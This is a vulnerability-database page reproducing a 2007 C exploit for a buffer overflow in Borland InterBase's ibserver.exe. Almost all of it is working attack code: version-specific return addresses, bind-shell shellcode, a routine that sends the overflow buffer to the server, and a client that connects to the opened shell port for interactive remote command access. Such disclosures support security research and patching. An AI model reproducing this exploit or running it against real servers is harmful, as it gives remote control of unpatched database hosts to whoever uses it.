Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

borland-overflow.txt

🗓️ 31 Jul 2007 00:00:00Reported by BackBoneType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

borland interbase ibserver.exe buffer overflow vulnerability exploit cod

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`/*  
  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html  
  
Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P  
All your base are belong to FD2K2!  
  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <winsock2.h>  
#include <windows.h>  
#pragma comment(lib,"ws2_32")  
  
#define IB_PORT "3050"  
// 0xFF - 0x8, jmp 8 bytes back  
#define JMP "\x90\x90\xEB\xF7"  
// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode  
CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF";  
// BIG_JMP SIZE  
#define BIG_JMP_SIZE 5  
  
CHAR ASCII_SHIT[]=  
"\r\n >__ _ ___\r\n"  
" / __\\26/07/2007| | __ / __\\ ___ _ __ ___ \r\n"  
" /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n"  
" / \\/ \\ (_| | (__| </ \\/ \\ (_) | | | | __/\r\n"  
" \\_____/\\__,_|\\___|_|\\_\\_____/\\___/|_| |_|\\___>\r\n"  
" _______________BackBone_(c)_2007_______\r\n\r\n";  
  
struct  
{  
char* cVersion;  
DWORD dwRet;  
DWORD dwLength1;  
DWORD dwLength2;  
}  
targets[]=  
{  
{"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123  
{"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129  
{"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181  
{"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6  
},v;  
  
// don't change the offset  
#define PORT_OFFSET 170  
#define BIND_PORT 10282  
  
// bindshell shellcode from www.metasploit.com,mod by skylined  
unsigned char shellcode[] =  
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"  
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"  
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"  
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"  
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"  
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"  
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"  
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"  
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"  
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"  
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"  
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"  
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"  
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"  
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"  
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"  
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"  
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"  
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"  
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"  
"\x83\xc4\x5c\x61\xeb\x89";  
  
#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);  
  
unsigned long lookupaddress(const char* pchost)  
{  
unsigned long nremoteaddr = inet_addr(pchost);  
  
if (nremoteaddr == INADDR_NONE)  
{  
struct hostent* phe = gethostbyname(pchost);  
  
if (phe == 0)  
return INADDR_NONE;  
nremoteaddr = *((u_long*)phe->h_addr_list[0]);  
}  
return nremoteaddr;  
}  
  
void showusage(char* argv)  
{  
int i;  
  
printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv);  
printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT);  
printf("[*] Targets:\r\n\r\n");  
for (i=0;i<(sizeof(targets)/sizeof(v));i++)  
printf("\t%2d: %s\r\n",i,targets[i].cVersion);  
}  
  
void showinfo(void)  
{  
printf("%s",ASCII_SHIT);  
printf(" Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n");  
printf(" Advisory provided by TPTI-07-13.\r\n");  
printf(" Exploit by BackBone.\r\n\r\n");  
}  
  
/* ripped from TESO code and modifed by ey4s for win32 */  
void shell (int sock)  
{  
int l;  
char buf[512];  
struct timeval time;  
unsigned long ul[2];  
  
time.tv_sec = 1;  
time.tv_usec = 0;  
  
while(1)  
{  
ul[0]=1;  
ul[1]=sock;  
  
l=select(0,(fd_set*)&ul,NULL,NULL,&time);  
if(l==1)  
{  
l=recv(sock,buf,sizeof(buf),0);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
l=write(1,buf,l);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
}  
else  
{  
l=read(0,buf,sizeof(buf));  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
l=send(sock,buf,l,0);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
}  
}  
}  
  
int main(int argc, char *argv[])  
{  
char *host,*port;  
unsigned long ulip;  
WSADATA wsa;  
SOCKET s;  
struct sockaddr_in sock_in;  
char buffer[16384];  
int bind,type;  
unsigned int size=0;  
DWORD dwLen1,dwLen2;  
DWORD dwBigJmp=0xFFFFFFFF;  
int i;  
  
showinfo();  
  
if (argc<3 || argc>4)  
{  
showusage(argv[0]);  
return -1;  
}  
  
host=strtok(argv[1],":");  
if((port=strtok(NULL,":"))==0)  
port=IB_PORT;  
  
if (WSAStartup(MAKEWORD(1,0),&wsa)!=0)  
{  
printf("[-] WSAStartup() error.\r\n");  
return -1;  
}  
  
ulip=lookupaddress(host);  
if (ulip==INADDR_ANY || ulip==INADDR_NONE)  
{  
printf("[-] invalid ip or host.\r\n");  
return -1;  
}  
  
if (atoi(port)<0 || atoi(port)>65534)  
{  
printf("[-] invalid port.\r\n");  
return -1;  
}  
  
type=atoi(argv[2]);  
if (type>(sizeof(targets)/sizeof(v))-1 || type<0)  
{  
printf("[-] invalid target type.\r\n");  
return -1;  
}  
  
printf("[+] Target: %s\r\n",targets[type].cVersion);  
  
bind=BIND_PORT;  
if (argc==4)  
{  
if (atoi(argv[3])>0 && atoi(argv[3])<65535)  
bind=atoi(argv[3]);  
}  
SET_BIND_PORT(bind);  
  
s=socket(AF_INET, SOCK_STREAM,0);  
if (s==INVALID_SOCKET)  
{  
printf("[-] socket() error.\r\n",s);  
return -1;  
}  
  
sock_in.sin_port=htons((u_short)atoi(port));  
sock_in.sin_family=AF_INET;  
sock_in.sin_addr.s_addr=ulip;  
  
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,  
(ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port));  
  
if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)  
{  
printf("Failed!\r\n");  
closesocket(s);  
WSACleanup();  
return -1;  
}  
  
printf("Ok.\r\n");  
  
// constructing the buffer  
memset(buffer,0,16384);  
  
memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8);  
size+=8;  
  
dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3));  
  
memcpy(buffer+size,&dwLen1,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE));  
size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE);  
  
// shellcode  
memcpy(buffer+size,shellcode,sizeof(shellcode));  
size+=sizeof(shellcode);  
  
// jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE)  
dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE;  
// prepare jump code  
memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD));  
// write big jump code  
memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE);  
size+=BIG_JMP_SIZE;  
  
// jmp 8 bytes back  
memcpy(buffer+size,JMP,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
// return addr  
memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
memset(buffer+size,0xFF,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
dwLen2=htonl(targets[type].dwLength2);  
  
memcpy(buffer+size,&dwLen2,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
memset(buffer+size,0x90,targets[type].dwLength2);  
size+=targets[type].dwLength2;  
  
printf("[+] Sending buffer (len: %u) ... ",size);  
  
if (!send(s,buffer,size,0))  
{  
printf("Failed.\r\n");  
closesocket(s);  
WSACleanup();  
return -1;  
}  
  
printf("Ok.\r\n");  
  
closesocket(s);  
  
Sleep(1000);  
  
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,  
(ulip>>16)&0xff,(ulip>>24)&0xff,bind);  
  
s=socket(AF_INET, SOCK_STREAM,0);  
if (s==INVALID_SOCKET)  
{  
printf("socket() error.\r\n",s);  
WSACleanup();  
return -1;  
}  
  
sock_in.sin_port=htons((u_short)bind);  
sock_in.sin_family=AF_INET;  
sock_in.sin_addr.s_addr=ulip;  
  
if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)  
{  
printf("Failed!\r\n");  
closesocket(s);  
WSACleanup();  
return -1;  
}  
  
printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n");  
  
shell(s);  
  
closesocket(s);  
  
WSACleanup();  
  
return 0;  
}  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
borland interbase ibserver.exebuffer overflowvulnerabilityexploit codefull disclosure
19
.json
Report